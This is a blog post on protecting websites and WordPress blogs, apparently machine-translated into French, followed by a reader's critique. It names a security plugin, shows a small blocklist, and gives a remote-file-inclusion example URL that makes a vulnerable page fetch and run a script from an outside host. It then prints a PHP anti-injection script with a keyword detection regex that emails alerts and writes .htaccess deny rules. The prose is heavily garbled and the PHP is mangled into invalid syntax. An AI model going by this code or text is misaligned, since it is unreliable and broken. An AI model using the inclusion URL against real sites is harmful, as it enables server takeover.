Il est nécessaire de blog et de la sécurité Web
Vous savez probablement que dans de nombreux cas, les pages web ou des blogs d'essayer de pirater, gâcher, contaminer de nombreux vides de sens les commentaires anonymes automatiquement, en utilisant des scripts. Bien sûr, assez souvent s'applique en mode manuel Vous n'avez pas idée de ce que d'un nombre assez impressionnant cas Abies, une méthode de défense est vraiment -.. Vérifier les demandes, et les paramètres IP d'autres envoyés à l'malfaiteur, et de les bloquer. Il suffit d'utiliser mes méthodes proposées, non seulement pour se défendre, mais aussi pour découvrir dans quelle mesure et à quelle fréquence vous attaquez. En savoir plus ...
Blog protection
Bien que le répertoire fournit un "manuel" façon d'utiliser Wordpress est une protection spéciale qui permet pour un site plus sûr et plus propre - Plugin sécurité TimesToCome . Après avoir installé ce plugin va ajouter des paramètres de sécurité. Personnellement, j'utilise l'adresse IP suivante bloquée, l'agent utilisateur et des enquêtes - une partie de la raison, comme vous avez attrapé le spectacle ici (vous pouvez également utiliser vos dossiers). Et même si vous pouvez le voir, même dans Firefox, Internet Explorer - elle est souvent appelée bots.
Avertissement. Nepriisiimu toute responsabilité pour fournies ici ont bloqué la propriété intellectuelle, l'agent utilisateur, requêtes, laissez chaque visiteur de décider si un dossier est approprié.
| IP bloquée: (Ceci est votre liste d'adresses IP bannies :) | User Agents bloqués (Ceci est votre liste d'agents banni) | Demandes bloquées (Ceci est votre liste noire demande) |
12.192.82.221 | AnotherBot | $ _GET |
Qu'est-ce que la requête et pourquoi ils ont besoin pour bloquer? Disons que votre site est une échappatoire ou simplement supposé l'horizon papuolėte offensive (mais souvent juste en attaquant les requêtes offensives dans une rangée).
Supposons qu'un sidebar.php des fichiers non sûrs passé les requêtes variables sidebar.php VARIABLES? VARIABLE = http://www.kompiuteriszombis.com/botas.txt, votre serveur sera exécuté le script botas.txt, et vous pouvez dire, dans la plupart des cas, votre serveur est déjà piraté.
Sécurité du site.
Si vous avez un site web, vous pouvez utiliser ce script, vous devez l'enregistrer sur votre index.php, et changer nemapirškite email@email.com dans votre email. email
/ ******************************* ANTIHACK DEBUT **************** ************** /
/ / Vérifier l'injection
$ Req = $ _SERVER ['REQUEST_URI'];
$ Cadena = explode (, $ req "?");
$ De $ de Mi_url = Cadena [0];
$ $ = Restaurants Cadena [1];
/ / Ici vous pouvez mettre vos chaînes soupçons à votre volonté. Faites juste attention de
/ / Coïncidences pas demander à votre URL avec des variables et des paramètres
Inyecc $ = '/ script | http | <|> |% 3c |% 3e | SELECT | UNION | MISE À JOUR | exe | exec | INSERT | tmp / i';
/ / Détection
if (preg_match (inyecc $, $ resto) &&! $ _REQUEST ['FullURL']) {
/ / Faire quelque chose, dans l'exemple envoyer une alerte e-mail à l'administrateur
/ / $ Ip = $ _SERVER ["HTTP_CLIENT_IP"];
$ Ip = $ _SERVER ['REMOTE_ADDR'];
= $ Transmises $ _SERVER ['HTTP_X_FORWARDED_FOR'];
$ $ = RemoteAddress _SERVER ["REMOTE_ADDR"];
$ Message = attaque par injection "dans mi_url $ \ n \ nchain: $ resto \ n \ n
De: (IP-forwa-RA): - $ ip - $ transmis - RemoteAddress $ \ n \ n
--- Fin ------- ";
Email ( email@email.com , «attaque par injection", $ message,
"De:" info @ {$ _SERVER ['SERVER_NAME']} ","-fwebmaster @ {$ _SERVER ['SERVER_NAME']} ");
# # # # Uzbaninam trop. Htaccess
$ Fh = fopen ('htaccess.', 'A') or die ("Impossible d'ouvrir le fichier.");
$ PourÉcrire = "\ n # $ RemoteAddress - $ Reste";
$ PourÉcrire = "\ Ndeny de $ ip \ n".;
fwrite ($ fh, $ pourÉcrire);
fclose ($ fh);
# # # #
/ / Tuer le message et l'exécution
'url illégale »d'écho;
die ();
}
/ ******************************* FIN ANTIHACK **************** ************** /
2008 12 20 10:12
Pour un tel il ya longtemps dalikams Apache mod_security est créée - je n'ai pas besoin de réinventer la roue.
En ce qui concerne preg'o - n'a pas été mentionné dans "ftp" protocole de requête "Supprimer SQL. A également examiné non seulement la requête, mais les noms de variables - de sorte avant d'utiliser ce code, chacun doit le considérer comme significatif que l'utilisation
Beja, l'injection SQL peut être fait et sur la gauche de la "?" Adresse Eančia.
Si le code du système est tordu - il suffit de requête GET ne sera pas une protection suffisante, ont besoin de filtrer les messages et les cookies.
Il serait beaucoup plus agréable à voir les commentaires de code lituaniens partout, pas seulement dans certains endroits.
Eh bien, les certificats pour le fichier htaccess -. Pas le plus sûr d'occupation. Bien sûr, tout dépend sur le système hôte.